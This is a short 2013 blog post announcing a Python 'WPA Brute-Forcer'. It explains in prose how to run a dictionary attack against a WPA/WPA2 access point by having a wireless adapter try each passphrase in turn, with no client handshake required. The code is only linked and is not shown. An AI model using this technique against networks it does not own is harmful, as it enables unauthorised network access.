Thursday, December 26, 2013

WPA Brute-Forcer

The purpose of me writing this Python script is to show that without having a client connected to a WPA/WPA2 Access Point, we still can crack the passphrase.
In order for the application to work, WPA Supplicant and Python must be install on the Linux system.
I have tested it on  Kali-Linux and it works fine.

I have heard from many people that without a "Client", we are unable to crack a WPA passphrase. It is partially true.

Yes, indeed without a client connected to a WPA/WPA2 encrypted access point, we are unable to get a 4-ways handshake for cracking the passphrase with Aircrack-NG. But, we can still attempt to crack the WPA/WPA2 by using our wirelesss adapter as a client to try to connect to the target access point with different passphrase.

The theory is simple...
 - we are not trying to get a 4 way handshake since there is no client connected to the access point.
 - we will use dictionary attack on the access point with the list of passphrase using our wireless adapter.

Note : Cracking is slow, but this is just to show that without a client connected to the target access point, we can still be able to crack a WPA/WPA2 access point.

Source code can be found at here
The script is written for educational purpose only. Testing are to be done in your own system.